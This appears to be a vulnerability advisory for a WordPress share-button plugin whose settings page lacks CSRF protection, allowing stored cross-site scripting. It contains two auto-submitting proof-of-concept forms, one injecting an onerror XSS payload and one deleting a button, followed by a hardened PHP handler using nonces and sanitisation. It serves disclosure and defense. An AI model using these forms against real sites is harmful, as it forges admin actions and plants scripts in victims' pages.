The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack. Because some of the settings are neither sanitised nor escaped, this could also lead to Stored Cross-Site Scripting.
<!-- PoC 1: update a share button -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=Sharebar" method="POST">
  <input type="text" name="name" value="facebook">
  <input type="text" name="position" value="1">
  <input type="text" name="enabled" value="0">
  <input type="text" name="enabled" value="1">
  <input type="text" name="big" value="<a>test1</a><img src=x onerror=alert(/XSS/)>">
  <input type="text" name="small" value="<a>test2</a><img src=x onerror=alert(/XSS/)>">
  <input type="text" name="do" value="update">
  <input type="text" name="id" value="1">
  <input type="text" name="status" value="Share button has been updated.">
</form>
<script>
  document.getElementById("test").submit();
</script>

<!-- PoC 2: delete a share button (separate page) -->
<form id="test" action="https://example.com/wp-admin/options-general.php?page=Sharebar" method="POST">
  <input type="text" name="do" value="delete">
  <input type="text" name="id" value="5">
  <input type="text" name="status" value="Button has been deleted.">
</form>
<script>
  document.getElementById("test").submit();
</script>
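A hardened form of the kind of settings handler this report describes, as an added example that is not the plugin's own code: it checks capability and a nonce before acting, and sanitises the fields on save. The `example_sharebar_*` function names, the nonce action/field and the storage option are hypothetical; the field names and the `page=Sharebar` slug are taken from the proof of concept.

```php
<?php
// Added example: hypothetical handler, not the plugin's own code.
// Assumed names: example_sharebar_* functions, the nonce action/field
// and the 'example_sharebar_buttons' option used for storage.
const EXAMPLE_NONCE_ACTION = 'example_sharebar_save';
const EXAMPLE_NONCE_FIELD  = 'example_sharebar_nonce';

// Markup allowed in the "big"/"small" fields. Event-handler attributes
// such as onerror are not listed, so wp_kses() strips them.
function example_sharebar_allowed_html() {
    return array(
        'a'   => array( 'href' => true, 'title' => true, 'class' => true ),
        'img' => array( 'src' => true, 'alt' => true ),
    );
}
// Call inside the settings <form> to emit the hidden nonce field.
function example_sharebar_nonce_field() {
    wp_nonce_field( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );
}
function example_sharebar_handle_post() {
    if ( 'Sharebar' !== ( $_GET['page'] ?? '' ) || empty( $_POST['do'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Stops the request unless it carries a valid nonce for this action,
    // which a cross-site auto-submitting form cannot supply.
    check_admin_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );

    $post    = wp_unslash( $_POST );
    $id      = absint( $post['id'] ?? 0 );
    $buttons = get_option( 'example_sharebar_buttons', array() );
    $allowed = example_sharebar_allowed_html();

    if ( 'delete' === $post['do'] ) {
        unset( $buttons[ $id ] );
    } elseif ( 'update' === $post['do'] ) {
        $buttons[ $id ] = array(
            'name'     => sanitize_text_field( $post['name'] ?? '' ),
            'position' => absint( $post['position'] ?? 0 ),
            'enabled'  => empty( $post['enabled'] ) ? 0 : 1,
            'big'      => wp_kses( $post['big'] ?? '', $allowed ),
            'small'    => wp_kses( $post['small'] ?? '', $allowed ),
        );
    }
    update_option( 'example_sharebar_buttons', $buttons );
}
add_action( 'admin_init', 'example_sharebar_handle_post' );
```

When rendering stored values, escape again at output with `esc_html()` / `esc_attr()`, or `wp_kses()` with the same allow-list for the fields that may contain markup.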
Daniel Ruf
Yes
2022-06-15 (about 7 months ago)